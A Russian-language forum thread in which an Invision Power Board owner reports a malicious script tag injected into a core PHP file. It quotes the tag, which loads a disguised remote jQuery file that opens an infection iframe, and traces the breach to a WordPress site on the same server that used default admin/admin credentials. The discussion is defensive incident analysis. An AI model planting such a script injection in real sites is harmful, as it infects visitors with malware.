Взлом ipb?

[andreuka]

Здравствуйте, сегодня обнаружил у меня в ipb подключение js скрипта с сайта stummann.net.

Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php?

Выглядит это както так <script language="JavaScript" src="__stummann.net/steffen/google-analytics/jquery-1.6.5.min.js" type="text/javascript"></script>

 

Само содержание скрипта дает понять что он банально открывает маленький iframe, через который чаще всего распространяются вирусы.

 

Проверяйте свои сообщества! А то побанят всех))

[spoken]

Так вот как этот скрипт появился у меня в /ips_kernel/classDB.php?

 

На этот вопрос только расследование взлома может дать ответ. Надо изучать логи, бэкапы и т.д, и т.п.

[Respected]

А версия форума последняя? 

[andreuka]

Уже все расследовал. Теория такая
На 1 и том же сервере стоит еще несколько wordpress, на 1 из них стоял стандартный пароль admin admin

Только что прогнал все файлы через антивирус, и именно на том сайте нашел php.shell и php.exploit.

 

Так что это похоже на последствие массовой атаки на wordpress

[Lordbl4]

WP такой WP...

[andreuka]

В шапке всех других сайтов тоже появился этот скрипт

 

Он вставляется во всех php файлах где есть </head>

Изменено 22 августа, 2013 пользователем andreuka